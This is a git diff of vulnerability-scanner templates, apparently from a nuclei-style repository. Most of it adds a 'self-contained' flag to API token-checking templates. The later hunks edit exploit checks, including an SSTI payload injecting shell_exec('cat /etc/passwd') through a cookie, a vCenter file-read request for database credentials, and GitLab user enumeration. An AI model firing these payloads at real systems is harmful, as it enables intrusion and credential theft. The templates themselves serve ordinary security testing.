--- a/token-spray/pagerduty.yaml
+++ b/token-spray/pagerduty.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,pagerduty
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/pendo.yaml b/token-spray/pendo.yaml
index 8ea141bcc0..66cd885dc6 100644
--- a/token-spray/pendo.yaml
+++ b/token-spray/pendo.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,pendo
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/pivotaltracker.yaml b/token-spray/pivotaltracker.yaml
index c52e04af9a..d7a74ded66 100644
--- a/token-spray/pivotaltracker.yaml
+++ b/token-spray/pivotaltracker.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,pivotaltracker
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/postmark.yaml b/token-spray/postmark.yaml
index 5b5aead0dc..85367b5c61 100644
--- a/token-spray/postmark.yaml
+++ b/token-spray/postmark.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,postmark
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/sendgrid.yaml b/token-spray/sendgrid.yaml
index b887b0b7d1..d9330371f1 100644
--- a/token-spray/sendgrid.yaml
+++ b/token-spray/sendgrid.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,sendgrid
+self-contained: true
network:
- inputs:
- data: "ehlo\r\n"
diff --git a/token-spray/slack.yaml b/token-spray/slack.yaml
index 2703830f3a..8203aa56b5 100644
--- a/token-spray/slack.yaml
+++ b/token-spray/slack.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,slack
+self-contained: true
requests:
- method: POST
path:
diff --git a/token-spray/sonarcloud.yaml b/token-spray/sonarcloud.yaml
index fdf0dc6724..aed9d1760f 100644
--- a/token-spray/sonarcloud.yaml
+++ b/token-spray/sonarcloud.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,sonarcloud
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/spotify.yaml b/token-spray/spotify.yaml
index 2ccc098209..01f1d80084 100644
--- a/token-spray/spotify.yaml
+++ b/token-spray/spotify.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,spotify
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/square.yaml b/token-spray/square.yaml
index 383e3ddc8a..7ccb835189 100644
--- a/token-spray/square.yaml
+++ b/token-spray/square.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,square
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/stripe.yaml b/token-spray/stripe.yaml
index 16e358e75a..50e8979aa7 100644
--- a/token-spray/stripe.yaml
+++ b/token-spray/stripe.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,stripe
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/tinypng.yaml b/token-spray/tinypng.yaml
index 922e62848b..357fb1bdbf 100644
--- a/token-spray/tinypng.yaml
+++ b/token-spray/tinypng.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,tinypng
+self-contained: true
requests:
- method: POST
path:
diff --git a/token-spray/travisci.yaml b/token-spray/travisci.yaml
index 5212516fc1..3b43f9e529 100644
--- a/token-spray/travisci.yaml
+++ b/token-spray/travisci.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,travis
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/twitter.yaml b/token-spray/twitter.yaml
index d648daa0d1..ec654b2782 100644
--- a/token-spray/twitter.yaml
+++ b/token-spray/twitter.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,twitter
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/visualstudio.yaml b/token-spray/visualstudio.yaml
index a05d17e57a..e7c0a0a2f8 100644
--- a/token-spray/visualstudio.yaml
+++ b/token-spray/visualstudio.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,visualstudio,microsoft
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/wakatime.yaml b/token-spray/wakatime.yaml
index b48ed5e79f..7237446fce 100644
--- a/token-spray/wakatime.yaml
+++ b/token-spray/wakatime.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,wakatime
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/weglot.yaml b/token-spray/weglot.yaml
index 9c1a8e2874..37e6b647ef 100644
--- a/token-spray/weglot.yaml
+++ b/token-spray/weglot.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,weglot
+self-contained: true
requests:
- method: POST
path:
diff --git a/token-spray/youtube.yaml b/token-spray/youtube.yaml
index 3ab7726092..8c1384579b 100644
--- a/token-spray/youtube.yaml
+++ b/token-spray/youtube.yaml
@@ -7,17 +7,19 @@ info:
severity: info
tags: token-spray,youtube
+self-contained: true
requests:
- method: GET
path:
- "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}"
- matchers-condition: or
+ matchers-condition: or
matchers:
- type: word
part: body
words:
- 'quotaExceeded'
+
- type: status
status:
- 200
diff --git a/vulnerabilities/gitlab/gitlab-user-enumeration.yaml b/vulnerabilities/gitlab/gitlab-user-enumeration.yaml
index 70867414e7..869b0ddd14 100644
--- a/vulnerabilities/gitlab/gitlab-user-enumeration.yaml
+++ b/vulnerabilities/gitlab/gitlab-user-enumeration.yaml
@@ -16,10 +16,9 @@ requests:
Accept: application/json, text/plain, */*
Referer: {{BaseURL}}
+ threads: 50
payloads:
user: helpers/wordlists/user-list.txt
- attack: sniper
- threads: 50
matchers-condition: and
matchers:
diff --git a/vulnerabilities/gitlab/gitlab-user-open-api.yaml b/vulnerabilities/gitlab/gitlab-user-open-api.yaml
index e6b7567303..8302f25e2a 100644
--- a/vulnerabilities/gitlab/gitlab-user-open-api.yaml
+++ b/vulnerabilities/gitlab/gitlab-user-open-api.yaml
@@ -15,10 +15,9 @@ requests:
Accept: application/json, text/plain, */*
Referer: {{BaseURL}}
+ threads: 50
payloads:
uid: helpers/wordlists/numbers.txt
- attack: sniper
- threads: 50
matchers-condition: and
matchers:
diff --git a/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml b/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml
index 889fd93cff..f1d82689fa 100644
--- a/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml
+++ b/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml
@@ -12,6 +12,8 @@ requests:
- "{{BaseURL}}"
headers:
Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
+
+ skip-variables-check: true
matchers-condition: and
matchers:
- type: status
diff --git a/vulnerabilities/other/rconfig-rce.yaml b/vulnerabilities/other/rconfig-rce.yaml
index c08699eb6d..00bc474218 100644
--- a/vulnerabilities/other/rconfig-rce.yaml
+++ b/vulnerabilities/other/rconfig-rce.yaml
@@ -33,7 +33,7 @@ requests:
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="email"
- test@{{randstr.tld}}
+ test@{{randstr}}.tld
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="editid"
diff --git a/vulnerabilities/vmware/vmware-vcenter-lfi.yaml b/vulnerabilities/vmware/vmware-vcenter-lfi.yaml
index 2fc7c98a9e..9ee7ce40bb 100644
--- a/vulnerabilities/vmware/vmware-vcenter-lfi.yaml
+++ b/vulnerabilities/vmware/vmware-vcenter-lfi.yaml
@@ -12,7 +12,7 @@ info:
requests:
- raw:
- |
- GET /eam/vib?id=§path§\vcdb.properties HTTP/1.1
+ GET /eam/vib?id={{path}}\vcdb.properties HTTP/1.1
Host: {{Hostname}}
payloads:
@@ -20,14 +20,13 @@ requests:
- "C:\\ProgramData\\VMware\\VMware+VirtualCenter" # vCenter Server 5.5 and earlier (Windows 2008)
- "C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter" # Other Windows versions
- "C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx" # vCenter Server => 6.0
- attack: sniper
matchers-condition: and
matchers:
- type: regex
regex:
- "(?m)^(driver|dbtype|password(\\.encrypted)?)\\s="
- part: body
+
- type: status
status:
- 200